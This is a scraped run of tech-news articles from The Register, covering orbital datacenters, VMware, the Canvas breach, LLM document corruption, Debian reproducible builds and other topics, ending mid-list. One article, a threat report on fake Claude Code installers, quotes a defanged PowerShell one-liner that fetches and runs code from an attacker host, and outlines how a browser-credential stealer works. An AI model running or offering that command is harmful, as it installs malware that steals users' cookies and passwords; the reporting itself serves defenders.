TheRegister
Red Hat blasts RHEL 10.1 into orbit aboard Voyager's micro datacenter
Red Hat Enterprise Linux 10.1 has powered up on board a datacenter orbiting 250 miles, or about 400 km, above the Earth. That RHEL-powered satellite is Voyager’s LEOcloud Space Edge “micro” datacenter, which launched aboard a SpaceX Falcon 9 rocket and hitched a ride to the International Space Station (ISS) back in September. The system is designed to demonstrate the advantages of processing data gathered directly in orbit, rather than sending it back to a conventional terrestrial datacenter. Voyager boasts that the reduction in latency makes the system as much as 30x faster than sending all the data back to Earth. Originally developed by LEOcloud prior to its acquisition by Voyager last year, Space Edge is, as its name suggests, a low-power edge compute platform for orbital data processing. Voyager and Red Hat contend that “as commercial and government organizations increase their reliance on space-based data, the ability to process data in orbit is increasingly critical.” And they certainly wouldn’t be the first to suggest that. Faced with terrestrial power constraints, SpaceX, Amazon, Google, Nvidia, and others have all announced plans to put large clusters of AI datacenters in orbit, with some designs aiming to cram 100kW worth of compute onboard a single satellite. The company hasn’t disclosed the hardware used in Voyager’s Space Edge, stating only that it’s a “space-hardened managed cloud infrastructure.” Hardening is certainly a concern for complex electronics operating outside Earth’s atmosphere, where charged particles and radiation can corrupt data or do permanent damage over time. HPE’s Spaceborne compute platform demonstrated many of these challenges during its first mission aboard the ISS in 2017. Over the course of that mission the system, which was composed mostly of off-the-shelf components, suffered several upsets including a power failure and SSDs that failed at an “alarming rate,” HPE's Mark Fernandez said at the time. 
We’ve reached out to Voyager for comment on the system and what kind of data its “micro” datacenter will process during its mission. We’ll let you know if we hear anything back. It’s safe to assume Space Edge’s compute capacity is limited, as promotional images show its systems are little larger than a shoebox - and therefore offer less room for components than servers used on Earth. What we do know is that RHEL 10.1, along with Red Hat’s Universal Base Image (UBI), is up and running on the ISS. Specifically, Space Edge is running RHEL in image mode, an immutable build of the OS in which changes to most directories reset to a known good state upon reboot. This means that any issues related to what Red Hat calls "configuration drift" can be addressed by turning the machine off and back on again, a feature we’re sure will be popular among many in the IT crowd. Alongside the base OS, Space Edge is also running Red Hat’s UBI container image under Podman, a container engine similar to Docker that is rootless and daemonless by default. RHEL 10.1’s arrival in orbit comes amid renewed interest in space driven by the yearning of every great hyperscaler to boldly go and generate tokens where no one has before. Actually, they have, but not at scale. But that’s exactly what SpaceX, Amazon, and others have proposed. In pursuit of unlimited power, the two companies have independently filed to put large constellations of AI satellite compute platforms in sun-synchronous orbit. In February, SpaceX filed an application with the Federal Communications Commission to lob a million space-based datacenters into orbit. Meanwhile, Amazon has proposed a slightly smaller constellation of 51,600 data processing satellites. Of course, these plans have one small problem left to solve: How will they get those sats into orbit for less than the cost of simply building more terrestrial infrastructure? 
According to one space datacenter startup, the economics of orbital datacenters won’t be viable until the cost to orbit falls to around $10 per kilogram. As of writing, a rideshare aboard a Falcon 9 runs about $7,000 a kilogram. ®
Categories: Linux fréttir
Quit VMware and you’ll emerge with more complex and less capable infrastructure
Organizations that decide to reduce their VMware footprints, or quit Virtzilla entirely, will emerge with more complex and less capable infrastructure. That’s the view of Paul Delory, a research vice president with analyst firm Gartner, who yesterday told the company’s IT Infrastructure, Operations & Cloud Strategies Conference in Sydney that there is no technical reason for VMware users to adopt a rival hypervisor, and that no vendor offers a one-for-one replacement for the virtualization pioneer’s flagship Cloud Foundation (VCF) suite. But Delory said Broadcom’s licensing policies, which see it only sell VCF, mean VMware users’ licensing bills typically rise by 300 to 400 percent. Broadcom argues that the full-stack private clouds VCF makes it possible to build are so efficient that VCF quickly pays for itself. The analyst told the conference he thinks those contemplating a move off VMware will do better if they instead focus on application modernization. But he said Broadcom’s price changes, and the prospect the company might hike prices again in future, mean many VMware users will look elsewhere. Those who do, he warned, will end up with more complex infrastructure for two reasons. One is that few organizations will be able to quit VMware entirely, as they run applications with dependencies that aren’t easy or economical to unwind. Reducing or eliminating a VMware rig therefore means adopting multiple replacements, which creates more infrastructure to manage and therefore extra complexity. The other is that no rival hypervisor can match the efficiency or VM density possible when using VMware’s products, so moving means acquiring more hardware. Delory said the best alternatives to VMware are the public cloud, or HCI vendors – these days that acronym denotes both hyperconverged infrastructure and hybrid cloud infrastructure. 
The analyst warned that HCI vendors, with the exception of Nutanix, have weak migration tools that will leave users needing to create bespoke migration automations using “Ansible and a Rube Goldberg machine.” Public clouds, he said, will welcome customers who move 1,000 or more VMs with free migration services. He recommended against considering OpenStack, which he said remains “too big, too complex, and has too many moving parts for the typical IT shop to handle effectively.” Delory also warned VMware users that migration projects are significant engineering undertakings that require extensive assessment of every application in a fleet to determine its best destination, and the work required to get it there. He reminded VMware users that not every workload is certified to run under non-VMware hypervisors, and that some vendors now offer cloud-native versions of their wares and therefore offer an easier on-ramp to containerised applications. Delory advised exploring those options, and not making architectural decisions that mean you can’t consider moving off VMware. “VMware is betting that you can’t move off and they can jack the price way up,” he said. “That may be a good bet. But don’t make it easy.” The analyst finished his talk by predicting most users will minimize their VMware footprints, rather than eliminating them, and restated Gartner’s prediction that 35 percent of workloads currently running under VMware will operate on a different platform by 2028. ®
Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks, as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and, for many, Advanced Placement testing. As of Saturday, the company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters had defaced about 330 Canvas school login portals, again exploiting the same Free-for-Teacher vulnerability, which prompted the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools, including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. 
After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Rodent-obsessed developer creates Ratty to bring 3D graphics to the command line
When you think of a terminal emulator, you imagine a command line interface filled with ASCII text and a prompt. However, one developer has reimagined the experience to include inline 3D objects and image support. Dubbed Ratty by its creator Orhun Parmaksiz for its 3D spinning rat cursor, the terminal window itself is a 3D canvas that supports sprites and 3D models, can render 3D drawings in real time, and even includes its own graphics protocol. “Terminal emulators are a big part of our daily lives as developers but yet we are not making enough innovations in that space,” Parmaksiz told The Register in an email. “With Ratty I hope to inspire others to experiment with terminals and push the limits of what they can do.” Parmaksiz wrote in his blog post introducing Ratty that he accomplished the whole thing using his own Rust terminal interface library, Ratatui, along with the Bevy game engine, also built with Rust. The aforementioned Ratty Graphics Protocol was created in order to register 3D assets and place them in an anchored terminal cell space. “Ratty separates terminal emulation from presentation: one side handles PTY I/O and terminal parsing, while the other turns the result into a GPU-rendered 2D or 3D scene,” Parmaksiz explained. “This allows for a lot of flexibility in how the terminal output is displayed (e.g. you can warp the whole damn thing).” Ratatui ends up serving as the terminal rendering layer, Parmaksiz explained, taking whatever the terminal state is, rebuilding it in its own buffer, and rendering said buffer onto a texture that is then rendered via Bevy. Given its design, be forewarned if you try to install and run Ratty: It’s going to eat up a lot of memory since it’s running a game engine. “I know, sacrificing 300 MB of RAM just to run a terminal emulator is a lot,” Parmaksiz said. 
“But everything comes with a cost, especially the spinning rat cursor.”

Building the fourth temple

Parmaksiz’s desire to push terminal emulators past their logical limits didn’t come from nowhere - he actually got inspiration from a source that some grey-hairs in the tech community might have been reminded of at the very beginning of this story: TempleOS. For those unfamiliar with TempleOS, it’s an operating system that was developed by the late Terry Davis, a schizophrenic, and arguably genius, software developer who believed he was building the OS at the command of God to serve as a digital Jewish Third Temple. Using TempleOS is an exercise in frustration given its confusing interface, not to mention its deliberate constraints (Davis believed its 640x480 desktop, 16-color display, single-voice audio and other features were part of God’s commandment), but it also included a fascinating capability not seen in other OSes: first-class, insertable sprites on the command line. “I was blown away by the creativity and passion behind it,” Parmaksiz told us of TempleOS, noting that 3D command line sprites in the OS were his inspiration for Ratty. “I wanted to see how adopting that to a modern-day terminal emulator would look like and experimented with a couple of other things while I was at it. I'm super happy with the result!” Parmaksiz told us that a number of people instantly caught on to the TempleOS inspiration, and that the feedback has been overwhelmingly positive. That said, he also admitted that most people who’ve used it have been scratching their heads over an actual use case. “I think this will also clarify itself if we give it more time,” Parmaksiz said in his email. “I mean... 
I really would like to see a full-fledged CAD program in the terminal built with Ratty Graphical Protocol at some point!” Whether that’ll ever happen remains to be seen - this is purely a fun project for now and Parmaksiz isn’t even sure it’s in his personal time budget to continue to maintain. “I'm just testing the waters for now, but the reception has been amazing so far. I would be happy to continue development if people start using Ratty and start developing cool things with it,” Parmaksiz said, noting that the code is open and he’d be thrilled if others contributed. Parmaksiz has developed a Ratatui widget that enables devs to build applications that run in Ratty, like a temple runner knockoff. “My ultimate goal with Ratty is to explore the possibilities of what a terminal can be and inspire new ideas and projects in the terminal space,” Parmaksiz wrote in his blog post. “I believe these kinds of experiments are where creativity is born and I hope to spark some ideas for the future of terminals.” ®
Microsoft researchers find AI models and agents can't handle long-running tasks
Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. 
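The round trip in that accounting challenge is simple to picture. Here is a minimal sketch, assuming a hypothetical list-of-dicts record layout (the paper's actual seed document format isn't given here); the models' failures amount to losing or mangling entries somewhere in this loop:

```python
# Sketch of the DELEGATE-52 accounting round trip: split a ledger into
# per-category "files", then merge them back into one chronological
# ledger. The record layout is hypothetical - the benchmark's real seed
# document format isn't public. A faithful agent should hand back
# exactly the data it was given.
from collections import defaultdict

ledger = [
    {"date": "2025-01-05", "category": "grants", "amount": 5000},
    {"date": "2025-01-12", "category": "hosting", "amount": -120},
    {"date": "2025-02-01", "category": "grants", "amount": 2500},
    {"date": "2025-02-09", "category": "hosting", "amount": -120},
]

# Step 1: split into one list per category (stand-ins for the files).
by_category = defaultdict(list)
for entry in ledger:
    by_category[entry["category"]].append(entry)

# Step 2: merge the category lists back chronologically.
merged = sorted(
    (entry for entries in by_category.values() for entry in entries),
    key=lambda entry: entry["date"],
)

# Lossless round trip: nothing dropped, nothing corrupted.
assert merged == sorted(ledger, key=lambda entry: entry["date"])
```

Trivial for twenty lines of Python; the benchmark's point is that models asked to do the equivalent over 20 interactions quietly lose chunks of the ledger along the way.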
The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They only found one domain qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. 
Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®
Cookie thieves caught stealing dev secrets via fake Claude Code installers
An ongoing campaign is stealing developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer while pointing at an attacker-controlled host. In this case, the legitimate command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaces the destination host, yielding “irm events[.]msft23[.]com | iex”. The payload is unique and doesn’t match any documented malware family. It does, however, wreak havoc on developers by exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attack also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who had used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code” and selecting a sponsored result that leads to a lookalike Claude Code installation page. 
The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native ABE helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, falling back to the legacy IElevator interface on the Elevation Service if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. After receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say they compared the malware against published reporting for several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. 
The orchestration model, however, differs from Glove’s in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” This split matters for defenders, the research team says, because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
OpenAI can't have incompetent AI consultants ruining the market, so bought its own
OpenAI can’t have inexperienced consultants derailing the AI hype train, so it’s launching a consultancy of its own to help enterprises find the value in its models needed to justify their spending - revenue that Sam Altman's company desperately needs to cover its infrastructure costs. To support the endeavor, OpenAI has agreed to acquire UK-based AI consulting firm Tomoro. The terms of the acquisition weren’t disclosed. Tomoro will form the backbone of the OpenAI Deployment Company, which will operate as a standalone business unit tasked with helping enterprises find the value that they've been missing from the AI flag bearer's models. But don’t worry, McKinsey. OpenAI’s new Forward Deployed Engineers (FDEs) are only there to make sure you don’t sour enterprises on AI by dragging them down an expensive rabbit hole that fails to deliver value. The new company is backed by the usual assortment of AI-crazed venture capitalists and private equity firms, and several consultancies, including Capgemini, Bain, and, yep, McKinsey, have agreed to plow billions into the venture. OpenAI says that its AI consultancy will launch with more than $4 billion of investments. Presumably, these consultancies will call in OpenAI’s FDEs when they need help proving AI can boost productivity and/or cut payroll. According to OpenAI, a typical enterprise engagement will look a bit like this: OpenAI’s FDEs will run a diagnostic to determine where AI can create the most value, then carry out a select set of proofs of concept (PoCs). If successful, the FDEs will then design, build, and deploy production systems that tie into enterprises' existing customer data and tools. The experience gained from these integrations will no doubt be used to improve OpenAI’s models and services. The acquisition of Tomoro will bring approximately 150 FDEs and deployment specialists into OpenAI’s new consultancy unit. The deal is expected to close in the coming months, subject to regulatory approvals. 
Whether enterprises should hitch their wagon to OpenAI’s success at a time when inference providers and model devs are already jacking up prices in an effort to get their infrastructure costs under control is another matter entirely. As we reported last week, with the launch of GPT-5.5, OpenAI once again increased its API pricing. Per million tokens, GPT-5.5 is priced at $5 (input), $0.50 (cached input), and $30 (output), double that of its predecessor. But don’t worry, OpenAI says the model might be more frugal about how it uses those tokens. ®
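At those rates the per-call arithmetic is straightforward; a quick sketch, with made-up token counts purely for illustration:

```python
# Back-of-envelope cost of a single GPT-5.5 API call at the quoted
# rates: $5 per million input tokens, $0.50 per million cached input
# tokens, $30 per million output tokens. Token counts below are
# illustrative, not from any real workload.
PRICE_PER_MILLION = {"input": 5.00, "cached_input": 0.50, "output": 30.00}

def request_cost(input_toks: int, cached_toks: int, output_toks: int) -> float:
    """Dollar cost of one API call."""
    return (
        input_toks * PRICE_PER_MILLION["input"]
        + cached_toks * PRICE_PER_MILLION["cached_input"]
        + output_toks * PRICE_PER_MILLION["output"]
    ) / 1_000_000

# 10k fresh input tokens, 40k served from cache, 2k generated:
print(request_cost(10_000, 40_000, 2_000))  # → 0.13
```

As the output side dominates at $30 per million, "more frugal about how it uses those tokens" mostly means generating fewer of them.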
Debian 14 cracks down on unreproducible packages
About halfway through the Debian 14 “Forky” development process, its release team announced a new goal: deterministic package compilation. The Debian project’s latest Bits from the release team newsletter describes a goal that may not sound very big, but it will mean significant extra effort in a direction that could prove to be a valuable extra security measure. "Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages," wrote release team member Paul Gevers. "Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility." Of the two links in that paragraph, the independent Reproducible Builds project does not, in this vulture’s humble opinion, explain what it’s all about very clearly. We feel that Debian’s own Reproducible Builds wiki page does it better: It should be possible to reproduce, byte for byte, every build of every package in Debian. The Wikipedia article also has a good, clear explanation, and introduces a helpful synonym: deterministic compilation. In other words, if you use the same version of the same compiler with the same options, then every time you compile an identical set of source files, the process ought to result in an identical set of binary files. This is starting to become an industry trend – for instance, when we reported on the release of FreeBSD 15 late last year, we noted that it too now promises reproducible builds. Reproducible builds in Debian have been a long time coming: The Register first reported on Debian’s efforts in this direction way back in 2015. It’s not an easy task, but it’s a useful security measure. The idea is to ensure that binaries have not been tampered with – for instance, modified to insert malware. 
It permits an additional verification step, so that users or automated tools can check whether the binaries they (or their OS package manager) downloaded are byte-identical to the ones they can compile themselves. Without this, you just have to trust the distributor who compiled your OS – as Ubuntu “self-appointed benevolent dictator for life” Mark Shuttleworth pointed out in 2012. (The Internet Archive has a copy of his long-gone blog post.) We also mentioned reproducible builds when we looked at NixOS Raccoon back in 2022, and tried to explain why it was a desirable thing. (Around the same time, Rocky Linux CEO Greg Kurtzer also told us that it was part of the plan for that project, too.) NixOS is already a little further down the reproducibility trail, and as we reported on its add-on Flox deployment tool in 2024, it also aims to deliver reproducible deployments. This won’t directly make Debian safer. It’s already one of the safer and more stable Linux distros there are, anyway. Instead, it’s about infrastructure changes that make it easier to check the supply chain, and to make it possible to write software that can check and verify that what you’re getting really is what you thought that you were getting. If it all works, you won’t be able to tell any difference – but auditing tools will. Debian 13 came out last August, and so Debian 14 is expected in about a year – although it does not have to stick to a rigorous fixed schedule like the commercially-backed projects. ®
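Once builds really are deterministic, the verification step itself is nothing more than a byte-for-byte comparison. A minimal sketch (file paths are hypothetical; in practice, Debian tooling such as debrebuild aims to automate the rebuild half):

```python
# Check whether a downloaded package matches an independent local
# rebuild by comparing SHA-256 digests - byte-identical artifacts are
# the whole point of reproducible builds. Paths are hypothetical.
import hashlib

def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 and return its hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def is_reproduced(downloaded: str, rebuilt: str) -> bool:
    """True if the two artifacts are byte-for-byte identical."""
    return sha256_of(downloaded) == sha256_of(rebuilt)
```

If the digests disagree, either the build isn't deterministic yet or someone has tampered with the binary - which is exactly the distinction the auditing tools are there to surface.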
Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. 
“The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone gasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.”

cURL code is no stranger to AI

To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzzers since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl throughout the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” That experience with AI testing, in other words, makes cURL a good benchmark for whether Mythos can really find more than the average AI tool.
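Fuzz testing, mentioned above, means hammering a target with randomized input and flagging any failure mode the developers didn't intend. A toy Python sketch of the idea, using the standard library's urllib.parse as a stand-in target rather than curl itself:

```python
import random
import string
from urllib.parse import urlsplit

def fuzz_urlsplit(trials=2000, seed=1234):
    """Throw random printable garbage at urlsplit and record the outcomes.

    The only invariant checked here: the parser either returns a result
    or raises a clean ValueError. Anything else (an unexpected exception,
    or in a C parser a crash) counts as a finding - which is exactly what
    fuzzers hunt for.
    """
    rng = random.Random(seed)
    outcomes = {"parsed": 0, "rejected": 0, "findings": 0}
    for _ in range(trials):
        s = "".join(rng.choice(string.printable)
                    for _ in range(rng.randint(0, 60)))
        try:
            urlsplit(s)
            outcomes["parsed"] += 1
        except ValueError:
            outcomes["rejected"] += 1   # clean rejection is acceptable
        except Exception:
            outcomes["findings"] += 1   # unexpected failure mode
    return outcomes
```

Real-world fuzzers, such as the OSS-Fuzz harnesses the curl project runs, layer coverage guidance and corpus mutation on top of this blind-random approach.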
As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to the technology’s ability to improve software, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.”

Mythos isn’t any more creative than its creators

Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code.
“Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, as with the valuable AI-assisted reports made to the cURL bug bounty program before its closure amid a flood of AI garbage, getting real value out of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope that the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: Linux fréttir
Gtk2-NG, next generation of Gtk 2, comes back to life
An effort to revive and reinvigorate the 2002 Gtk2 GUI programming toolkit is growing and gaining interest… as we predicted would happen a few months ago. The gtk2-ng project is reviving and modernizing Gtk version 2, which the GNOME developers declared dead back in 2020. We held off on reporting this for a while to see if the idea would gain some support, and it does seem to be winning interest and followers. Reviving a 24-year-old toolkit that reached its official end-of-life six years ago is a retrospective sort of undertaking, and as such, it appeals to some modern-but-nostalgic development projects. Development is hosted on the Git instance of the Devuan project, the systemd-free fork of Debian. (Last year, Devuan announced its support of Xlibre, the X.org fork that aims to re-invigorate X11 development.) However, developer Daemonratte announced the fork in a thread on the forums of the Pale Moon browser: GTK2 revival. Pale Moon, as we described in 2021, is a continuing fork of an early version of Firefox. Back in February, when we covered the news that Debian 14 planned to drop Gtk2, we mentioned that this might provide the impetus for a fork. This isn’t the first such fork, and we mentioned then that the Ardour digital audio workstation we last looked at in 2022 maintains its own internal version called YTK. Daemonratte says that they’ve already incorporated some fixes from that, and also from an earlier fork by stefan11111, which has been inactive for a couple of years.
They then outline the current goals:

Current status:
- Making it Y2K38-safe
- Getting rid of all deprecation warnings
- Patching it for NetBSD and backporting NetBSD-specific patches
- Testing it on all kinds of hardware
- Further modernization without breaking ABI

Future plans:
